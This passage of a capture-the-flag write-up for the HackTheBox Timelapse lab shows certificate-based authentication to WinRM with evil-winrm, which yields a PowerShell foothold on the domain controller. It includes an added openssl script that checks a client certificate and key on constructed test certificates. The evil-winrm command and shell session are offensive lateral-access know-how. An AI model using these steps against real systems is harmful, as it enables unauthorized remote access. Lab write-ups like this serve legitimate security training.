WinRM


Among the many things that can be done with a valid domain certificate and key, one is authenticating to the WinRM server. The target system hosts a WinRM server over SSL on port 5986, which accepts a certificate and key file for authentication in place of a password.

As suspected earlier, the PFX file appears to belong to the legacyy user. It is not definitively clear whether legacyy is a member of the Remote Management Users group, but it is reasonable to assume so, primarily because the term “WinRM” appears explicitly in the backup archive’s filename. This suggests an association between the user and the group, which would allow a PowerShell session over WinRM. Either way, the assumption is cheap to test: if the account is not permitted to connect, evil-winrm simply fails at the connection step and nothing is lost.
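
Before pointing evil-winrm at the port, it is worth confirming that the certificate and key are actually usable for WinRM certificate authentication: the private key must match the certificate, the certificate must carry the Client Authentication EKU and not be expired, and the UPN in its subjectAltName is what the server maps to an account. The script below is an added example, not part of the original writeup; it generates its own constructed self-signed certificates to demonstrate the checks, and assumes the real files are PEM-encoded (as evil-winrm’s -c and -k expect) and that openssl is on the path. The helper names, file names and the demo UPNs are the example’s own.

```sh
#!/bin/sh
# Added example (not from the writeup): pre-flight checks on a PEM client
# certificate and key before using them with evil-winrm -c/-k against WinRM/5986.
# WinRM certificate auth needs the Client Authentication EKU, an unexpired cert,
# and a UPN in subjectAltName for the server to map the cert to an account.

# Print the UPN from subjectAltName, or a note if this OpenSSL cannot decode it.
cert_upn() {
    txt=$(openssl x509 -in "$1" -noout -text 2>/dev/null)
    # OpenSSL 3.x renders the otherName as "othername: UPN::user@realm" or
    # "othername: UPN:user@realm"; OpenSSL 1.1.1 prints "othername:<unsupported>".
    upn=$(printf '%s\n' "$txt" | sed -n 's/.*othername: *UPN:\{1,2\}\([^,[:space:]]*\).*/\1/p' | head -n 1)
    if [ -n "$upn" ]; then
        printf '%s\n' "$upn"
    elif printf '%s\n' "$txt" | grep -q 'othername'; then
        echo "(otherName present but this openssl cannot decode it; inspect with openssl asn1parse)"
    else
        echo "(none)"
    fi
}

# Return 0 only if the key matches the cert, the cert has the clientAuth EKU,
# and the cert has not expired. Each failure is reported on stdout.
check_winrm_cert() {
    cert="$1"; key="$2"
    if [ "$(openssl x509 -in "$cert" -noout -pubkey 2>/dev/null)" != "$(openssl pkey -in "$key" -pubout 2>/dev/null)" ]; then
        echo "FAIL: $key does not match $cert"; return 1
    fi
    if ! openssl x509 -in "$cert" -noout -text 2>/dev/null | grep -q 'TLS Web Client Authentication'; then
        echo "FAIL: $cert lacks the Client Authentication EKU (1.3.6.1.5.5.7.3.2)"; return 1
    fi
    if ! openssl x509 -in "$cert" -noout -checkend 0 >/dev/null 2>&1; then
        echo "FAIL: $cert has expired"; return 1
    fi
    echo "OK: key matches, clientAuth EKU present, $(openssl x509 -in "$cert" -noout -enddate)"
    echo "    SAN UPN: $(cert_upn "$cert")"
    return 0
}

# Build a constructed self-signed client cert (demo data, not the box's cert).
# $1 = output path prefix, $2 = UPN to embed, $3 = EKU list or "" for none.
make_test_cert() {
    out="$1"; upn="$2"; eku="$3"
    openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 -out "$out.key" 2>/dev/null
    {
        echo '[req]'
        echo 'distinguished_name = dn'
        echo 'x509_extensions = ext'
        echo '[dn]'
        echo '[ext]'
        echo "subjectAltName = otherName:1.3.6.1.4.1.311.20.2.3;UTF8:$upn"
        [ -z "$eku" ] || echo "extendedKeyUsage = $eku"
    } > "$out.cnf"
    openssl req -x509 -new -key "$out.key" -out "$out.crt" -days 30 \
        -subj "/CN=${upn%@*}" -config "$out.cnf"
}

# Stand-alone demo on constructed certs; against the real files run e.g.
#   check_winrm_cert smb/Dev/legacyy_dev_auth.public smb/Dev/legacyy_dev_auth.private.decrypted
demo() {
    d=$(mktemp -d)
    make_test_cert "$d/good"  "legacyy@timelapse.htb" clientAuth
    make_test_cert "$d/other" "other@timelapse.htb"   clientAuth
    make_test_cert "$d/noeku" "legacyy@timelapse.htb" ""
    check_winrm_cert "$d/good.crt"  "$d/good.key"  || true   # passes
    check_winrm_cert "$d/good.crt"  "$d/other.key" || true   # wrong private key
    check_winrm_cert "$d/noeku.crt" "$d/noeku.key" || true   # missing clientAuth EKU
    rm -rf "$d"
}
demo
```

Against the real material, a reported SAN UPN of legacyy@timelapse.htb would settle which account the certificate represents before the WinRM attempt is made, and a key mismatch or missing EKU explains a failed connection without guessing at group membership. Older OpenSSL 1.1.1 builds cannot decode the UPN otherName, which the helper reports rather than treating as absent.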

┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ evil-winrm -i dc01.timelapse.htb -P 5986 -S -c smb/Dev/legacyy_dev_auth.public -k smb/Dev/legacyy_dev_auth.private.decrypted
 
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
*Evil-WinRM* PS C:\Users\legacyy\Documents> hostname
dc01
*Evil-WinRM* PS C:\Users\legacyy\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::245
   IPv6 Address. . . . . . . . . . . : dead:beef::cc93:dbe2:8401:964
   Link-local IPv6 Address . . . . . : fe80::cc93:dbe2:8401:964%13
   IPv4 Address. . . . . . . . . . . : 10.10.11.152
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%13
                                       10.10.10.2

Initial foothold established on the target system as the legacyy user via WinRM. The certificate authentication succeeded, which settles the earlier assumption: the certificate maps to legacyy and that account is permitted to open a remote PowerShell session on the domain controller.